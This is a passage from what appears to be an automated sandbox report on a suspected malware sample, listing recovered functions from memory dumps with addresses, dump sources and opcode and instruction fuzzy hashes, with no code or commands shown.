                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0f6c10633371a7f833ada4a230bceba6e52c295124c76484488e58b84f52210d
                                                                                      • Instruction ID: 5c5c04f3cef7688ddb23bea548bf1fe0919fc89dfaacdce98034db77127fc565
                                                                                      • Opcode Fuzzy Hash: 0f6c10633371a7f833ada4a230bceba6e52c295124c76484488e58b84f52210d
                                                                                      • Instruction Fuzzy Hash: 5041A0B4D022199FDB00DFA8D594BAEBBF2BF49304F1094A9E414B7390E7389A45CF94
                                                                                      Function 37412F10 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 838fd571e9c8c7bdbdc55a3c57a7477b6a2b3738b98a07deb513396f0907e4f7
                                                                                      • Instruction ID: c323b7bf4cb9d149cbad43362cb48ba3e3d684d350cddf695c479b4cd2a81163
                                                                                      • Opcode Fuzzy Hash: 838fd571e9c8c7bdbdc55a3c57a7477b6a2b3738b98a07deb513396f0907e4f7
                                                                                      • Instruction Fuzzy Hash: 5731C774E01258CBEB14DFAAD9546DDBBF2AF89300F20D12AC818BB258EB345946CF55
                                                                                      Function 37411931 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92bb8cf962cfb92708e1bf0e5d4f6d5951d8446f19a52af6eb6f1f81d17fcb35
                                                                                      • Instruction ID: 8522cc9a941de55d927b152c2d1efa977526ef05ecf6522106ee4b01a62f0aca
                                                                                      • Opcode Fuzzy Hash: 92bb8cf962cfb92708e1bf0e5d4f6d5951d8446f19a52af6eb6f1f81d17fcb35
                                                                                      • Instruction Fuzzy Hash: 3131D674E016088BEB44DFAAD9406DDBBF3AF8A300F24D12AC818BB254EB345942CF55
                                                                                      Function 37362BA7 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f47f7d207fe6b918e00d6a369bdc0c92d317abc6a28bc7be8217327819708d8
                                                                                      • Instruction ID: 9badc0986bdd898baf489c86a1d2f62d00eaaf345c67318c91553e358986a804
                                                                                      • Opcode Fuzzy Hash: 8f47f7d207fe6b918e00d6a369bdc0c92d317abc6a28bc7be8217327819708d8
                                                                                      • Instruction Fuzzy Hash: 9B412670E05248CBEB18CFAAC9446DDBBF2AF89300F20C12AC408BB258DB385942CF04
                                                                                      Function 37411F71 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf4cd23e73de5c37a04dc41f577585b7216d9ba4083458969036611b5cc74789
                                                                                      • Instruction ID: 00bdbb4fb5891026400df7b41691f3509b786745f8c051dbab4b68f14b831a10
                                                                                      • Opcode Fuzzy Hash: cf4cd23e73de5c37a04dc41f577585b7216d9ba4083458969036611b5cc74789
                                                                                      • Instruction Fuzzy Hash: F431E474E01648CBEB08DFAAD9506DEBBF2BF89300F20D12AD818BB254DB355942CF55
                                                                                      Function 37363457 Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c7d102f8575d247776e22ee2e83125e02e1aa784d6e88d45d11b1d1d33ad828
                                                                                      • Instruction ID: d148c80adafd3122776056f62d73e8aff2895e7442b62ecc073fef8d677d1e89
                                                                                      • Opcode Fuzzy Hash: 6c7d102f8575d247776e22ee2e83125e02e1aa784d6e88d45d11b1d1d33ad828
                                                                                      • Instruction Fuzzy Hash: 2D41E5B4E01248CBEB18CFAAD9546DDFBF2AF89304F20D12AC418BB259DB345946CF41
                                                                                      Function 37415170 Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e4600262a56dc6feec91650b4d12a0ff9a6d5757dfa742c57eef9382675f0cf
                                                                                      • Instruction ID: 58ace3f3c2b7351db8f022aec61895abd435257e70279fc207fab1235645bd5f
                                                                                      • Opcode Fuzzy Hash: 1e4600262a56dc6feec91650b4d12a0ff9a6d5757dfa742c57eef9382675f0cf
                                                                                      • Instruction Fuzzy Hash: 9E31C175E012588BEB04DFAAD8506DDFBF2AF89300F20D12AC818AB255EB345942CF55
                                                                                      Function 37414B32 Relevance: .1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95509df885beb8428a97e8d759832ec5ba300eea7fc2f5e6825ca21b0dab0a8f
                                                                                      • Instruction ID: 89f8636d5050bdb8211cd4e22babc28ec5e1412f2bcb6a0a3166bb2f583c8af4
                                                                                      • Opcode Fuzzy Hash: 95509df885beb8428a97e8d759832ec5ba300eea7fc2f5e6825ca21b0dab0a8f
                                                                                      • Instruction Fuzzy Hash: D731F474E01608CBEB14DFAAD9506EDBBF2BF89310F20D12AC818BB254EB345942CF54
                                                                                      Function 37416110 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ae48f18e6ebd1c2f89f58df369c7164af14a890be21593f4df68b869b1a6a94
                                                                                      • Instruction ID: f8eedcdbad382dc397fb1d4f5679850b552afb8faae43b6bc8879f4a58121dbd
                                                                                      • Opcode Fuzzy Hash: 0ae48f18e6ebd1c2f89f58df369c7164af14a890be21593f4df68b869b1a6a94
                                                                                      • Instruction Fuzzy Hash: CE31E774E01218CBEB04DFAAD9546EDFBF2AF89300F10D12AC418BB254DB349906CF55
                                                                                      Function 373685DA Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 831984a10986c2a600ec1a7203b9ed35dce0d5e33adbbb820099e7f91524a10c
                                                                                      • Instruction ID: 9b536548d84fbcf56d81713db2095ed9ff5bbaa04305221da59a093d3e3c4f1c
                                                                                      • Opcode Fuzzy Hash: 831984a10986c2a600ec1a7203b9ed35dce0d5e33adbbb820099e7f91524a10c
                                                                                      • Instruction Fuzzy Hash: 0C31C3B5E017188BEB18CFAAD8447DEBBF6AF88304F14D02AC408AB259DB751946DF40